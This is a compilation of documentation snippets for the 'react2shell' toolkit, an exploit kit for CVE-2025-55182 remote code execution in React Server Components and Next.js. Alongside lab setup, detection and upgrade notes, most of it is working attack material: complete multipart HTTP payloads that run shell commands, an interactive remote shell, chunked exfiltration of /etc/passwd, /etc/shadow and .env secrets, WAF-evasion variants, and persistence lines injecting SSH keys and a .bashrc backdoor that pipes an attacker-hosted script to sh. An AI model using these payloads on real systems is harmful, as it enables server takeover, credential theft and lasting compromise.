### Start Vulnerable Next.js Server
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Installs dependencies and starts the vulnerable Next.js server locally. The server will be accessible at http://localhost:3443. Ensure you have pnpm installed.
```bash
cd vulnerable-next-server
pnpm install
pnpm dev
```
--------------------------------
### Start Vulnerable Server (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Starts the vulnerable Next.js server in development mode. This command navigates to the server directory and runs the development server, which will be listening on http://localhost:3443. Ensure pnpm is installed for package management.
```bash
cd vulnerable-next-server
pnpm dev
# Server runs on http://localhost:3443
```
--------------------------------
### Reproducing Vulnerable Next.js Server Locally (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
These bash commands outline the steps to clone and run the vulnerable Next.js server locally for testing: install dependencies with pnpm, then start the development server.
```bash
git clone https://github.com/freeqaz/react2shell
cd react2shell/vulnerable-next-server
pnpm install
pnpm dev
```
--------------------------------
### Install and Run Next.js Development Server
Source: https://github.com/freeqaz/react2shell/blob/master/vulnerable-next-server/README.md
Installs project dependencies using pnpm and starts the Next.js development server on port 3443. This is the primary method for setting up the vulnerable testing environment.
```bash
pnpm install
pnpm dev
```
--------------------------------
### Starting the Vulnerable Next.js Development Server
Source: https://context7.com/freeqaz/react2shell/llms.txt
Instructions for setting up a vulnerable Next.js server environment. This involves cloning the repository with submodules, installing dependencies using pnpm, and starting the development server, typically on port 3443.
```bash
# Clone with submodules (includes React 19.2.0 and Next.js 16.0.6 source)
git clone --recurse-submodules https://github.com/freeqaz/react2shell
cd react2shell/vulnerable-next-server
# Install dependencies
pnpm install
# Start in development mode (port 3443)
pnpm dev
# Output:
# ▲ Next.js 16.0.6
# - Local: http://localhost:3443
# - Network: http://192.168.1.100:3443
#
# ✓ Ready in 1.8s
# Test from another terminal:
cd ..
./detect.sh http://localhost:3443
```
--------------------------------
### Launch Interactive Shell
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Starts an interactive pseudo-shell session on the target server, allowing for command execution and exploration similar to a standard terminal. Recommended for in-depth analysis.
```bash
./shell.sh http://localhost:3443
```
--------------------------------
### Start Vulnerable Server in Production Mode (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Starts the vulnerable Next.js server in production mode. This involves building the application and then starting the production server. This mode tests the server's error sanitization behavior in a production environment.
```bash
cd vulnerable-next-server
NODE_ENV=production pnpm build && pnpm start
# Tests production error sanitization behavior
```
--------------------------------
### Vulnerable Next.js Server Setup
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Contains the source code for a pre-configured vulnerable Next.js server, specifically Next.js 16.0.6 combined with React 19.2.0, which is susceptible to the disclosed vulnerabilities.
```bash
cd vulnerable-next-server/
pnpm install
pnpm dev
```
--------------------------------
### Starting Production Server (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
Commands to build and start the Next.js server in production mode. Production mode has sanitized error messages but still allows for certain exploit vectors.
```bash
# Build and start production server
cd vulnerable-next-server
NODE_ENV=production pnpm build && pnpm start
```
--------------------------------
### Clone Project with Git Submodules
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Instructions for cloning the `react2shell` project, including its Git submodules which contain the vulnerable source code for React and Next.js. This is crucial for source code analysis and understanding the vulnerability.
```bash
git clone --recurse-submodules https://github.com/freeqaz/react2shell
# Or if already cloned:
git submodule update --init --recursive
```
--------------------------------
### Build and Run Next.js Production Server
Source: https://github.com/freeqaz/react2shell/blob/master/vulnerable-next-server/README.md
Builds the Next.js application for production and then starts the production server. This mode is used to test production error sanitization, where certain exploit methods might not capture output but others remain functional.
```bash
pnpm build && pnpm start
```
--------------------------------
### Direct Module Gadget Exploit Syntax (JavaScript)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Shows examples of how the ejpir research PoC utilizes the 'module#export' syntax to directly access and execute built-in Node.js modules like 'vm', 'child_process', and 'fs'.
```javascript
// From: ./CVE-2025-55182-research/exploit-all-gadgets.js
{ id: 'vm#runInThisContext', bound: ['CODE'] }
{ id: 'child_process#execSync', bound: ['whoami'] }
{ id: 'fs#readFileSync', bound: ['/etc/passwd'] }
```
--------------------------------
### Plain Text Payload Example (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This snippet illustrates a 'text/plain' POST request payload. While simple, this method is noted as not viable for certain exploits because it may not allow referencing multiple data chunks, only creating a single field.
```http
POST / HTTP/1.1
Content-Type: text/plain
Next-Action: x
{"then":"$1:__proto__:then",...}
```
--------------------------------
### JavaScript Persistence Attacks using fs Module
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Shows examples of persistence attacks using the Node.js 'fs' module to inject SSH keys, add shell backdoors to .bashrc, or tamper with module source code.
```javascript
// SSH key injection
fs.appendFileSync('~/.ssh/authorized_keys', '\nssh-rsa ATTACKER_KEY...')
// Shell backdoor
fs.appendFileSync('~/.bashrc', '\ncurl http://attacker/shell.sh | sh')
// Source tampering
fs.writeFileSync('node_modules/...', 'malicious code')
```
--------------------------------
### Interactive Shell for Remote Servers
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
The `shell.sh` script provides an interactive shell experience for remote servers, mimicking a local shell. It includes features like tracking the working directory (persistent `cd`), command history, a colored prompt indicating user, host, and current working directory. It also supports a built-in `download` command for file exfiltration and allows local command execution prefixed with `!`. Each command is sent as a separate HTTP request.
```bash
./shell.sh http://localhost:3443
```
--------------------------------
### Exfiltrate Files with Chunking
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
The `exfil-file.sh` script facilitates the exfiltration of files from a target server. It supports basic usage to output to stdout, saving to a local file, and exfiltrating application secrets. For large files exceeding the header limit, it automatically switches to a chunked mode using `dd` to extract data in ~6KB pieces and reassembles them locally. The chunk size can be configured.
```bash
# Basic usage - output to stdout
./exfil-file.sh http://localhost:3443 /etc/passwd
# Save to local file
./exfil-file.sh http://localhost:3443 /etc/passwd ./passwd.txt
# Exfiltrate application secrets
./exfil-file.sh https://target.com /app/.env ./env.txt
# Override chunk size (default: 6000 bytes)
CHUNK_SIZE=4000 ./exfil-file.sh http://target /var/log/large.log
```
--------------------------------
### Run Detection Script
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes the `detect.sh` script to identify vulnerabilities in a target application. It takes the target URL as an argument and relies on specific HTTP responses (500 status, `E{"digest"` in response, `text/x-component` Content-Type) to indicate a vulnerable server.
```bash
./detect.sh http://target:3000
```
--------------------------------
### Interactive Shell via CVE-2025-55182 (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
This script provides a pseudo-interactive shell experience over RCE, leveraging CVE-2025-55182. It includes features like directory tracking, file downloading, and a set of built-in commands. The example session demonstrates its usage for command execution, file system navigation, and file retrieval.
```bash
#!/bin/bash
# shell.sh - Interactive REPL shell over CVE-2025-55182
./shell.sh https://target.example.com
# Example session:
# ╔═══════════════════════════════════════════════════════════╗
# ║ CVE-2025-55182 Interactive Shell ║
# ║ React Server Components RCE ║
# ╚═══════════════════════════════════════════════════════════╝
#
# [*] Connecting to https://target.example.com...
# Connected!
# User: www-data
# Host: webserver-prod-01
# CWD: /var/www/nextjs-app
#
# www-data@webserver-prod-01:/var/www/nextjs-app$ id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@webserver-prod-01:/var/www/nextjs-app$ ls -la
# total 128
# drwxr-xr-x 8 www-data www-data 4096 Dec 3 10:15 .
# drwxr-xr-x 3 www-data www-data 4096 Dec 1 08:30 ..
# -rw-r--r-- 1 www-data www-data 234 Dec 1 08:30 .env
# drwxr-xr-x 3 www-data www-data 4096 Dec 1 08:30 app
# -rw-r--r-- 1 www-data www-data 1892 Dec 1 08:30 next.config.js
#
# www-data@webserver-prod-01:/var/www/nextjs-app$ cd /etc
# www-data@webserver-prod-01:/etc$ cat hostname
# webserver-prod-01
#
# www-data@webserver-prod-01:/etc$ download passwd ./local-passwd.txt
# [*] Downloading: /etc/passwd -> ./local-passwd.txt
# [*] Attempting quick exfil (single request)...
# [+] Quick exfil succeeded: 1847 bytes
# [+] Saved to: ./local-passwd.txt
#
# www-data@webserver-prod-01:/etc$ !cat local-passwd.txt | head -3
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/usr/sbin:/usr/sbin/nologin
#
# www-data@webserver-prod-01:/etc$ help
# Built-in commands:
# help Show this help
# exit, quit, q Exit the shell
# cd  Change directory (state tracked between commands)
# download [o] Download remote file to local path
# ! Run command locally (not on target)
#
# www-data@webserver-prod-01:/etc$ exit
# Goodbye!
```
--------------------------------
### Exploit RCE via HTTP 500 Throw (Dev Mode)
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server and captures its standard output using an HTTP 500 error. This method is only effective in development mode. Replace 'COMMAND' with the desired command.
```bash
./exploit-throw.sh http://localhost:3443 "id"
```
--------------------------------
### Exploit RCE via HTTP 303 Redirect
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server and captures its standard output via an HTTP 303 redirect. This is the recommended exploit method. Replace 'COMMAND' with the desired command (e.g., 'id', 'cat /etc/passwd').
```bash
./exploit-redirect.sh http://localhost:3443 "id"
./exploit-redirect.sh http://localhost:3443 "cat /etc/passwd"
```
--------------------------------
### Chunking RCE Output in Redirect Mode for Large Files
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
These bash commands provide an example of how to retrieve large command outputs or file contents in chunks when using redirect-mode RCE, circumventing HTTP header size limitations. By repeatedly executing `dd` with `skip` and `count` parameters, different segments of the target file can be extracted sequentially.
```bash
# First 6000-byte chunk
./exploit-redirect.sh target "dd if=/etc/passwd bs=6000 count=1"
# Second 6000-byte chunk (skip=1 advances one block)
./exploit-redirect.sh target "dd if=/etc/passwd bs=6000 count=1 skip=1"
```
--------------------------------
### Multipart Form Data Payload Example (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This snippet shows a 'multipart/form-data' POST request payload. It is used to send data in multiple parts, suitable for complex payloads or when other content types might be blocked. It includes JSON data and a reference to another part.
```http
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model",...}
------Boundary
Content-Disposition: form-data; name="1"
"$@0"
------Boundary--
```
--------------------------------
### Output Capture Strategies via Function Calls
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
Demonstrates how to capture output from a constructed function by manipulating its resolution. Different strategies yield output in various ways: none (Blind), error body (Throw), redirect header (Redirect), or as a resolved argument (Reflect). The 'Redirect' method is recommended for production environments.
```javascript
function fn(resolve, reject) {
  // Example for Redirect strategy
  throw {digest:'NEXT_REDIRECT;...;'+b64(output)};
}
// Example for Reflect strategy
// arguments[0]([execSync('CMD').toString()])
```
--------------------------------
### Executing Commands for Output Capture (Node.js)
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
Illustrates the use of Node.js's `execSync` to execute shell commands as part of output capture strategies. The output is then converted to a string for further processing.
```javascript
const { execSync } = require('child_process');
// Used in Blind strategy
// execSync('CMD');0
// Used in Throw strategy
// throw execSync('CMD').toString()
// Used in Reflect strategy
// arguments[0]([execSync('CMD').toString()])
```
--------------------------------
### JavaScript: Server Reference Loading
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Illustrates how server references are loaded in a bundler configuration, highlighting the manifest lookup for action existence. This code is crucial for understanding the execution flow that can be exploited.
```javascript
function loadServerReference(bundlerConfig, id, bound) {
  var serverReference = resolveServerReference(bundlerConfig, id);
  // ↑ Manifest lookup happens here - fails if action doesn't exist
  // ... (remainder of the function omitted in this excerpt)
}
```
--------------------------------
### Test Vulnerability Detection
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Checks if the target server at the provided URL is vulnerable to CVE-2025-55182 / CVE-2025-66478. This script is non-destructive.
```bash
chmod +x *.sh
./detect.sh http://localhost:3443
```
--------------------------------
### POST / Multipart Payload (Redirect Mode)
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
Example of a raw HTTP POST request using multipart/form-data for the Redirect exploit mode.
```http
POST / HTTP/1.1
Host: localhost:3443
User-Agent: Mozilla/5.0
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length:
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"var o=Buffer.from(process.mainModule.require('child_process').execSync('id')).toString('base64');var e=new Error();e.digest='NEXT_REDIRECT;push;http://x/'+o+';307;';throw e;","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
--------------------------------
### Launch Interactive Shell (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Provides an interactive shell experience over the RCE vulnerability. Supports common shell commands like `cd`, `download`, `help`, `exit`, and executing local commands prefixed with `!`. It also tracks the current directory on the server.
```bash
./shell.sh http://localhost:3443
# Provides interactive shell experience over RCE
# Supports: cd, download, help, exit, !local_cmd
```
--------------------------------
### Exfiltrate File Content
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Extracts the content of a specified file from the target server and saves it locally. This script automatically handles large files by chunking them. Replace '/path/to/remote/file' and './local/destination.txt'.
```bash
./exfil-file.sh http://localhost:3443 /etc/passwd ./passwd.txt
```
--------------------------------
### Node Module Search Strategies for Flight Protocol Vulnerability
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
These bash commands illustrate how to search within Node modules for files and patterns related to the Flight protocol vulnerability, including Flight protocol implementation, reference resolution, and blob handling.
```bash
# Find Flight protocol implementation
grep -r "initializeModelChunk" vulnerable-next-server/node_modules/
# Find reference resolution
grep -r "__proto__" vulnerable-next-server/node_modules/ | grep -v ".map"
# Find blob handling
grep -r '\$B' vulnerable-next-server/node_modules/ | grep -v ".map"
```
--------------------------------
### Exploit Blind RCE
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server where the output is only visible in the server's terminal logs, not returned in the HTTP response. Replace 'COMMAND' with the desired command.
```bash
./exploit-blind.sh http://localhost:3443 "whoami"
```
--------------------------------
### Enumerate Action IDs
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Discovers valid 'action IDs' on the target server, which are required for URL-encoded and stealth exploit modes. These IDs are typically used to identify specific server actions.
```bash
./enumerate-actions.sh http://localhost:3443
```
--------------------------------
### Clone Repository with Submodules (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Clones the react2shell repository, ensuring that all git submodules, including vulnerable versions of React and Next.js, are also downloaded. Alternatively, if the repository is already cloned, this command can be used to initialize and update the submodules.
```bash
git clone --recurse-submodules https://github.com/freeqaz/react2shell
# Or if already cloned:
git submodule update --init --recursive
```
--------------------------------
### Helper Tools Summary
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
Summary of helper scripts, their purpose, and any relevant notes.
| Script | Purpose | Notes |
|---|---|---|
| `shell.sh` | Interactive shell | REPL with cd tracking, file download, readline history |
| `exfil-file.sh` | File exfiltration | Auto-chunks large files, reassembles locally |
| `enumerate-actions.sh` | Action ID discovery | Scrapes HTML for server action IDs |
| `detect.sh` | Vulnerability probe | Non-destructive detection (Searchlight method) |
| `test-size-limit.sh` | Size limit testing | Test header size limits on target |
--------------------------------
### Raw Payload: Array.map Chaining (lachlan2k)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Example of a raw payload demonstrating Array.map chaining, as utilized in the lachlan2k exploit. This payload exploits a vulnerability through chained method calls, specifically `map`.
```text
0=$1
1={"status":"resolved_model","reason":0,"_response":"$4","value":"{\"then\":\"$3:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}
2=$@3
3=[]
4={"_prefix":"CODE","_formData":{"get":"$3:constructor:constructor"},"_chunks":"$2:_response:_chunks"}
```
--------------------------------
### Root Cause Analysis - Flight Protocol Deserialization
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Illustrates the core vulnerability in the Flight protocol's deserialization process. The lack of property existence validation in path resolution allows for traversal to '__proto__.constructor.constructor', enabling RCE.
```javascript
// Vulnerable code pattern
for (let i = 1; i < path.length; i++) {
  value = value[path[i]]; // No hasOwnProperty check!
}
```
--------------------------------
### Raw Payload: Proto Pollution (React2Shell)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Example of a raw multipart form-data payload used for triggering proto pollution in React2Shell. This payload is designed to exploit a vulnerability related to chunk reference resolution during deserialization.
```text
------WebKitFormBoundary
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"CODE","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundary
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundary--
```
--------------------------------
### Identifying Vulnerable Package Versions with JSON
Source: https://context7.com/freeqaz/react2shell/llms.txt
Provides a JSON snippet from 'package.json' indicating vulnerable versions of 'react-server-dom-webpack' and 'next'. It also includes npm commands to check installed versions and upgrade to patched versions.
```jsonc
// package.json vulnerability indicators
{
  "dependencies": {
    // VULNERABLE React versions
    "react-server-dom-webpack": "19.0.0 || 19.1.0 || 19.1.1 || 19.2.0",
    "react-server-dom-turbopack": "19.0.0 || 19.1.0 || 19.1.1 || 19.2.0",
    "react-server-dom-parcel": "19.0.0 || 19.1.0 || 19.1.1 || 19.2.0",
    // VULNERABLE Next.js versions
    "next": "15.0.0 - 15.0.4 || 15.1.0 - 15.1.8 || 15.2.0 - 15.2.5 || 15.3.0 - 15.3.5 || 15.4.0 - 15.4.7 || 15.5.0 - 15.5.6 || 16.0.0 - 16.0.6"
  }
}
```
```bash
# Check installed versions:
npm ls next react-server-dom-webpack react-server-dom-turbopack
# Upgrade to patched versions:
npm install next@latest                      # 16.0.7+ or 15.x patched versions
npm install react-server-dom-webpack@latest  # 19.2.1+
```
--------------------------------
### Exploit Stealth RCE via HTTP 200
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server, returning an HTTP 200 OK status code. This method requires a valid ACTION_ID and an echo-style action payload. Replace 'ACTION_ID' and 'COMMAND'.
```bash
./exploit-reflect.sh http://localhost:3443 "ACTION_ID" "id"
```
--------------------------------
### Exploiting React Flight Protocol via Prototype Pollution (HTTP POST)
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
This snippet demonstrates a crafted multipart POST request exploiting React's Flight protocol. It abuses the reference system to traverse the prototype chain and achieve arbitrary code execution by tricking the deserializer into calling the JavaScript Function constructor. No prerequisites are needed for this attack.
```http
POST / HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----Boundary
Next-Action: x
------Boundary
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","value":"{...}","_response":{...}}
------Boundary
Content-Disposition: form-data; name="1"
"$@0"
------Boundary--
```
--------------------------------
### Function Reference Exploit with #constructor (Python)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Demonstrates the exploitation chain used by the shellinteractive PoC, leveraging Flight's function reference syntax combined with manifest lookup to reach the Function constructor. This requires a valid action ID.
```python
# From: ./CVE-2025-55182-shellinteractive/interative.py:90-94
multipart_data = {
    '0': (None, '"$F1"'),
    '1': (None, '{"id": "action_id#constructor", "bound": "$@2"}'),
    '2': (None, '["{CODE}"]')
}
```
--------------------------------
### Raw Payload: $F Reference (Shellinteractive)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Example of a raw multipart form-data payload used for the shellinteractive exploit, involving an '$F' reference. This payload targets the `loadServerReference` function by manipulating the `$F` reference for command execution.
```text
------WebKitFormBoundary
Content-Disposition: form-data; name="0"
"$F1"
------WebKitFormBoundary
Content-Disposition: form-data; name="1"
{"id":"action#constructor","bound":"$@2"}
------WebKitFormBoundary
Content-Disposition: form-data; name="2"
["CODE"]
------WebKitFormBoundary--
```
--------------------------------
### React Flight Reply Server - `getOutlinedModel` Path Construction
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
Shows how the `getOutlinedModel` function constructs the `path` array from the provided reference string. In the exploit scenario, this results in `path = ["1", "__proto__", "then"]`, setting up the traversal of the prototype chain.
```javascript
// Relevant lines from ReactFlightReplyServer.js
// `path = ["1", "__proto__", "then"]`, `id = 1`
```
--------------------------------
### Asynchronous Command Execution (JavaScript)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
JavaScript code demonstrating asynchronous command execution using `import('child_process')` and `execSync`. This snippet handles potential errors during command execution and returns the output or an error message.
```javascript
// From: ./CVE-2025-55182-shellinteractive/interative.py:75-85
return import('child_process').then(cp => {
  try {
    const output = cp.execSync(cmd).toString();
    return output;
  } catch(e) {
    return "Command Execution Failed: " + e.message;
  }
});
```
--------------------------------
### Exploit RCE via URL-Encoded Mode
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server using a URL-encoded payload. This method may bypass certain Web Application Firewalls (WAFs) and requires a valid ACTION_ID obtained from enumeration. Replace 'ACTION_ID' and 'COMMAND'.
```bash
./exploit-urlencoded.sh http://localhost:3443 "ACTION_ID" "id"
```
--------------------------------
### URL-Encoded Payload Example (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This snippet demonstrates an 'application/x-www-form-urlencoded' POST request payload. The data is sent as percent-encoded form fields in the request body, a format often used for simpler data transmission or as a WAF evasion technique. It contains URL-encoded JSON data and references.
```http
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Next-Action: x
0=%7B%22then%22%3A%22%241%3A__proto__%3Athen%22%2C...%7D&1=%22%24%400%22
```
--------------------------------
### Exploit Request Format for URL-Encoded Payload (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This is an example of an HTTP POST request formatted for exploiting the URL-encoded payload path in Next.js. It includes the necessary headers like 'Content-Type' and 'Next-Action' with a valid action ID, followed by the URL-encoded payload.
```http
POST / HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Next-Action:
0=&1=%22%24%400%22
```
--------------------------------
### Development vs. Production Error Output
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
Compares the structure of error messages returned in development and production environments. In production, React strips detailed error information, impacting strategies that rely on message content.
Development mode (full error object):
```json
{
  "digest": "...",
  "name": "Error",
  "message": "uid=501(free)...",
  "stack": [
    ...
  ]
}
```
Production mode (sanitized):
```json
{
  "digest": "..."
}
```
--------------------------------
### Execute Command via HTTP Throw (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
This script attempts to execute a command on a target server using an HTTP throw method. It is effective in development mode but is broken in production builds due to sanitized error messages. It requires the target URL and the command to execute.
```bash
#!/bin/bash
./exploit-throw.sh http://localhost:3443 "whoami"
```
--------------------------------
### React Flight Reply Server - Model Initialization
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
Shows the function `initializeModelChunk` within React's Flight Reply Server, which is called when a chunk's status matches 'resolved_model'. This function proceeds to parse the model data, including JSON parsing, which is where the attacker's payload is processed.
```javascript
// Relevant lines from ReactFlightReplyServer.js
// `initializeModelChunk()` runs
// `JSON.parse(resolvedModel)` parses our payload
```
--------------------------------
### Raw HTTP Request for Redirect Mode
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
This is an example of a raw HTTP POST request using multipart/form-data for the Redirect Mode exploit. It includes the complete payload structure within the form data, targeting the '0' field. The `Content-Type` and `boundary` headers are crucial for proper parsing by the server.
```http
POST / HTTP/1.1
Host: localhost:3443
User-Agent: Mozilla/5.0
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length:
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"var o=Buffer.from(process.mainModule.require('child_process').execSync('id')).toString('base64');var e=new Error();e.digest='NEXT_REDIRECT;push;http://x/'+o+';307;';throw e;","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
--------------------------------
### Chunked File Exfiltration with Auto-Reassembly (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
The exfil-file.sh script facilitates file exfiltration by automatically chunking large files to bypass HTTP header size limitations and reassembling them locally. It supports outputting to stdout or saving to a specified local file. The script first attempts a quick exfiltration and falls back to chunked mode if necessary, providing detailed progress.
```bash
#!/bin/bash
# exfil-file.sh - Chunked file exfiltration with automatic reassembly
# Basic usage - output to stdout
./exfil-file.sh https://target.example.com /etc/passwd
# Save to local file
./exfil-file.sh https://target.example.com /var/log/nginx/access.log ./access.log
# Output:
# === CVE-2025-55182 File Exfiltration ===
# [*] Target: https://target.example.com
# [*] File: /var/log/nginx/access.log
# [*] Output: ./access.log
#
# [*] Attempting quick exfil (single request)...
# [!] Quick exfil failed or file too large, switching to chunked mode...
#
# [*] Getting file size for: /var/log/nginx/access.log
# [+] File size: 45678 bytes
# [*] Chunks needed: 8 (6000 bytes each)
# [*] Chunk 1/8: offset=0 size=6000
# [*] Chunk 2/8: offset=6000 size=6000
# [*] Chunk 3/8: offset=12000 size=6000
# [*] Chunk 4/8: offset=18000 size=6000
# [*] Chunk 5/8: offset=24000 size=6000
# [*] Chunk 6/8: offset=30000 size=6000
# [*] Chunk 7/8: offset=36000 size=6000
# [*] Chunk 8/8: offset=42000 size=3678
# [+] Exfiltrated 45678 bytes (expected: 45678)
# [+] Saved to: ./access.log
```
--------------------------------
### Next.js Action Handler - Request Processing
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
Illustrates the initial steps of request processing in Next.js's action handler. It shows how a POST request with 'Next-Action: x' triggers multipart handling and the creation of a Busboy instance, which is a precursor to the vulnerability.
```typescript
// Relevant lines from action-handler.ts
// POST with `Next-Action: x` triggers multipart handling
// Busboy instance created
// decodeReplyFromBusboy() called
```
--------------------------------
### Exfiltrate File with Chunking using exfil-file.sh
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
The `exfil-file.sh` script provides a robust solution for exfiltrating files of any size by automatically chunking them and reassembling them on the local machine. It includes options for basic usage, saving to a file, and customizing the chunk size. The script first attempts a single-request exfiltration and falls back to chunking if the file is too large.
```bash
# Basic usage - output to stdout
./exfil-file.sh http://localhost:3443 /etc/passwd
# Save to local file
./exfil-file.sh http://localhost:3443 /etc/shadow ./shadow.txt
# Custom chunk size (default: 6000 bytes)
CHUNK_SIZE=4000 ./exfil-file.sh http://localhost:3443 /var/log/app.log ./app.log
```